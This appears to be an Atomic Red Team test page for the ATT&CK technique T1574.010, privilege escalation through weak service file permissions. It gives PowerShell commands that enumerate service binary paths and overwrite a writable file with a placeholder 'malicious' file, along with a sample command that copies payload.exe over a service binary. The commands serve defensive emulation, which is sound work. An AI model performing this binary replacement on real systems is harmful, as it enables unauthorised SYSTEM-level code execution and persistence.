# T1574.010 - Services File Permissions Weakness
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1574.010)
<blockquote>Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.

Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.</blockquote>

## Atomic Tests

- [Atomic Test #1 - File System Permissions Weakness](#atomic-test-1---file-system-permissions-weakness)


<br/>

## Atomic Test #1 - File System Permissions Weakness
This test to show checking file system permissions weakness and which can lead to privilege escalation by replacing malicious file. Example; check weak file permission and then replace.
powershell -c "Get-WmiObject win32_service | select PathName"   (check service file location) and
copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe   ( replace weak permission file with malicious file )

Upon execution, open the weak permission file at %temp%\T1574.010_weak_permission_file.txt and verify that it's contents read " T1574.010 Malicious file". To verify
the weak file permissions, open File Explorer to%temp%\T1574.010_weak_permission_file.exe then open Properties and Security to view the Full Control permission is enabled.

**Supported Platforms:** Windows




#### Inputs:
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| malicious_file | File to replace weak permission file with | path | $env:TEMP&#92; T1574.010&#92; T1574.010_malicious_file.txt|
| weak_permission_file | check weak files permission | path | $env:TEMP&#92;T1574.010_weak_permission_file.txt|


#### Attack Commands: Run with `powershell`! 


```powershell
Get-WmiObject win32_service | select PathName
Copy-Item #{malicious_file} -Destination #{weak_permission_file} -Force
```

#### Cleanup Commands:
```powershell
Remove-Item #{weak_permission_file} -Force -ErrorAction Ignore
Remove-Item -Recurse (Split-Path #{malicious_file}) -Force -ErrorAction Ignore
```



#### Dependencies:  Run with `powershell`!
##### Description: A file must exist on disk at specified location (#{weak_permission_file})
##### Check Prereq Commands:
```powershell
if (Test-Path #{weak_permission_file}) {exit 0} else {exit 1} 
```
##### Get Prereq Commands:
```powershell
New-Item #{weak_permission_file} -Force | Out-Null
Set-Content -Path #{weak_permission_file} -Value " T1574.010 Weak permission file"
```
##### Description: A file to replace the original weak_permission_file. In an attack this would be the malicious file gaining extra privileges
##### Check Prereq Commands:
```powershell
if (Test-Path #{malicious_file}) {exit 0} else {exit 1} 
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory -Path $env:TEMP\ T1574.010\ -Force | Out-Null
New-Item #{malicious_file} -Force | Out-Null
Set-Content -Path #{malicious_file} -Value " T1574.010 Malicious file"
```




<br/>
